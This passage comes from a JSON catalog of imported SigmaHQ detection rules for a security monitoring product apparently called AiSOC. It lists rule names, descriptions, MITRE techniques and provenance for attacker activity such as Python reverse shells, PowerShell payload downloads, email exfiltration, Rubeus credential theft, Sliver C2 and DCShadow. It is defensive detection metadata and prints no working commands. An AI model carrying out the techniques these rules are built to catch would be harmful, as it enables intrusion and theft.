deletion of the \"Zone.Identifier\" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ads-zone-identifier-deleted-by-uncommon-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3109530e-ab47-4cc6-a953-cac5ebcc93ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml" } }, { "id": "sigmahq-sigma-311b6ce2-7890-4383-a8c2-663a9f6b43cd", "type": "detection", "name": "Enabled User Right in AD to Control User Objects", "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enabled-user-right-in-ad-to-control-user-objects.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" } }, { "id": "sigmahq-sigma-312b42b1-bded-4441-8b58-163a3af58775", "type": "detection", "name": "Potentially Suspicious Execution From Tmp Folder", "description": "Detects a potentially suspicious execution of a process located in the '/tmp/' folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-from-tmp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "312b42b1-bded-4441-8b58-163a3af58775", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml" } }, { "id": "sigmahq-sigma-312d0384-401c-4b8b-abdf-685ffba9a332", "type": "detection", "name": "Email Exifiltration Via Powershell", "description": "Detects email exfiltration via powershell cmdlets", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/email-exifiltration-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"312d0384-401c-4b8b-abdf-685ffba9a332", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_email_exfil.yml" } }, { "id": "sigmahq-sigma-3132570d-cab2-4561-9ea6-1743644b2290", "type": "detection", "name": "Kubernetes Events Deleted", "description": "Detects when events are deleted in Kubernetes.\nAn adversary may delete Kubernetes events in an attempt to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-events-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3132570d-cab2-4561-9ea6-1743644b2290", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml" } }, { "id": "sigmahq-sigma-313d6012-51a0-4d93-8dfc-de8553239e25", "type": "detection", "name": "Install New Package Via Winget Local Manifest", "description": "Detects usage of winget to install applications via manifest file. 
Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/install-new-package-via-winget-local-manifest.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "313d6012-51a0-4d93-8dfc-de8553239e25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml" } }, { "id": "sigmahq-sigma-313fbb0a-a341-4682-848d-6d6f8c4fab7c", "type": "detection", "name": "Suspicious PowerShell WindowStyle Option", "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-windowstyle-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" } }, { "id": "sigmahq-sigma-31545105-3444-4584-bebf-c466353230d2", "type": "detection", "name": "Touch Suspicious Service File", "description": "Detects usage of the \"touch\" process in service file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/touch-suspicious-service-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "31545105-3444-4584-bebf-c466353230d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_touch_susp.yml" } }, { "id": "sigmahq-sigma-318557a5-150c-4c8d-b70e-a9910e199857", "type": "detection", "name": "File Creation In Suspicious Directory By Msdt.EXE", "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-creation-in-suspicious-directory-by-msdt-exe.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "318557a5-150c-4c8d-b70e-a9910e199857", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml" } }, { "id": "sigmahq-sigma-31c51af6-e7aa-4da7-84d4-8f32cc580af2", "type": "detection", "name": "Sliver C2 Default Service Installation", "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sliver-c2-default-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml" } }, { "id": "sigmahq-sigma-31d68132-4038-47c7-8f8e-635a39a7c174", "type": "detection", "name": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", "description": "Detects potential Active Directory enumeration via LDAP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002", "T1087.002", "T1482" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-active-directory-reconnaissance-enumeration-via-ldap.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "31d68132-4038-47c7-8f8e-635a39a7c174", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/ldap/win_ldap_recon.yml" } }, { "id": "sigmahq-sigma-31e124fb-5dc4-42a0-83b3-44a69c77b271", "type": "detection", "name": "Antivirus Filter Driver Disallowed On Dev Drive - Registry", "description": "Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a \"Dev Drive\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/antivirus-filter-driver-disallowed-on-dev-drive-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "31e124fb-5dc4-42a0-83b3-44a69c77b271", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_devdrv_disallow_antivirus_filter.yml" } }, { "id": "sigmahq-sigma-320fccbf-5e32-4101-82b8-2679c5f007c6", "type": "detection", "name": "CodeIntegrity - Revoked Kernel Driver Loaded", "description": "Detects the load of a revoked kernel driver", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-revoked-kernel-driver-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "320fccbf-5e32-4101-82b8-2679c5f007c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml" } }, { "id": "sigmahq-sigma-3215aa19-f060-4332-86d5-5602511f3ca8", "type": "detection", "name": "Suspicious LNK Double Extension File Created", "description": "Detects the creation of files with an \"LNK\" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the \"LNK\" extension by default.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-lnk-double-extension-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3215aa19-f060-4332-86d5-5602511f3ca8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" } }, { "id": "sigmahq-sigma-322ed9ec-fcab-4f67-9a34-e7c6aef43614", 
"type": "detection", "name": "New Port Forwarding Rule Added Via Netsh.EXE", "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-port-forwarding-rule-added-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml" } }, { "id": "sigmahq-sigma-3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "type": "detection", "name": "PowerShell Download Via Net.WebClient - PowerShell Classic", "description": "Detects PowerShell download activity, via the .DownloadFile() or .DownloadString() methods of the Net.WebClient class.\nThis technique is often abused by attackers to download additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-download-via-net-webclient-powershell-classic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_download_via_webclient.yml" } }, { "id": "sigmahq-sigma-323ff3f5-0013-4847-bbd4-250b5edb62cc", "type": "detection", "name": "Modify System Firewall", "description": "Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modify-system-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "323ff3f5-0013-4847-bbd4-250b5edb62cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_modify_system_firewall.yml" } }, { "id": "sigmahq-sigma-32410e29-5f94-4568-b6a3-d91a8adad863", "type": "detection", "name": "PUA - Fast Reverse Proxy (FRP) Execution", "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-fast-reverse-proxy-frp-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32410e29-5f94-4568-b6a3-d91a8adad863", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_frp.yml" } }, { "id": "sigmahq-sigma-32438676-1dba-4ac7-bf69-b86cba995e05", "type": "detection", "name": "GCP Access Policy Deleted", "description": "Detects when an access policy that is applied to a GCP cloud resource is deleted.\nAn adversary would be able to remove access policies to gain access to a GCP cloud resource.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gcp-access-policy-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32438676-1dba-4ac7-bf69-b86cba995e05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_access_policy_deleted.yml" } }, { 
"id": "sigmahq-sigma-3245cd30-e015-40ff-a31d-5cadd5f377ec", "type": "detection", "name": "HackTool - Rubeus Execution - ScriptBlock", "description": "Detects the execution of the hacktool Rubeus using specific command line flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1558.003", "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-rubeus-execution-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml" } }, { "id": "sigmahq-sigma-3268b746-88d8-4cd3-bffc-30077d02c787", "type": "detection", "name": "HackTool - Empire PowerShell UAC Bypass", "description": "Detects some Empire PowerShell UAC bypass methods", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-empire-powershell-uac-bypass.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3268b746-88d8-4cd3-bffc-30077d02c787", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml" } }, { "id": 
"sigmahq-sigma-327f48c1-a6db-4eb8-875a-f6981f1b0183", "type": "detection", "name": "Port Forwarding Activity Via SSH.EXE", "description": "Detects port forwarding activity via SSH.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.001", "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/port-forwarding-activity-via-ssh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml" } }, { "id": "sigmahq-sigma-327ff235-94eb-4f06-b9de-aaee571324be", "type": "detection", "name": "Regsvr32 Execution From Highly Suspicious Location", "description": "Detects execution of regsvr32 where the DLL is located in a highly suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regsvr32-execution-from-highly-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "327ff235-94eb-4f06-b9de-aaee571324be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml" } }, { "id": "sigmahq-sigma-32b96012-7892-429e-b26c-ac2bf46066ff", "type": "detection", "name": "Shell32 DLL Execution in Suspicious Directory", "description": "Detects shell32.dll executing a DLL in a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell32-dll-execution-in-suspicious-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32b96012-7892-429e-b26c-ac2bf46066ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml" } }, { "id": "sigmahq-sigma-32d56ea1-417f-44ff-822b-882873f5f43b", "type": "detection", "name": "Impacket PsExec Execution", "description": "Detects execution of Impacket's psexec.py.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/impacket-psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32d56ea1-417f-44ff-822b-882873f5f43b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_impacket_psexec.yml" } }, { "id": "sigmahq-sigma-32e19d25-4aed-4860-a55a-be99cb0bf7ed", "type": "detection", "name": "Possible DC Shadow Attack", "description": "Detects DCShadow via the creation of a new SPN", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-dc-shadow-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_possible_dc_shadow.yml" } }, { "id": "sigmahq-sigma-32e280f1-8ad4-46ef-9e80-910657611fbc", "type": "detection", "name": "Potential Homoglyph Attack Using Lookalike Characters", "description": "Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading technique. 
Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-homoglyph-attack-using-lookalike-characters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32e280f1-8ad4-46ef-9e80-910657611fbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml" } }, { "id": "sigmahq-sigma-32e62bc7-3de0-4bb1-90af-532978fe42c0", "type": "detection", "name": "Python Reverse Shell Execution Via PTY And Socket Modules", "description": "Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-reverse-shell-execution-via-pty-and-socket-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32e62bc7-3de0-4bb1-90af-532978fe42c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml" } }, { "id": "sigmahq-sigma-33339be3-148b-4e16-af56-ad16ec6c7e7b", "type": "detection", "name": "Findstr Launching .lnk File", "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1202", "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/findstr-launching-lnk-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_lnk.yml" } }, { "id": "sigmahq-sigma-333cdbe8-27bb-4246-bf82-b41a0dca4b70", "type": "detection", "name": "Suspicious Volume Shadow Copy VSS_PS.dll Load", "description": "Detects the image load of vss_ps.dll by uncommon executables. 
This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.\nIt is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.\nThe fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-volume-shadow-copy-vss-ps-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml" } }, { "id": "sigmahq-sigma-3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "type": "detection", "name": "Sysinternals PsService Execution", "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysinternals-psservice-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", 
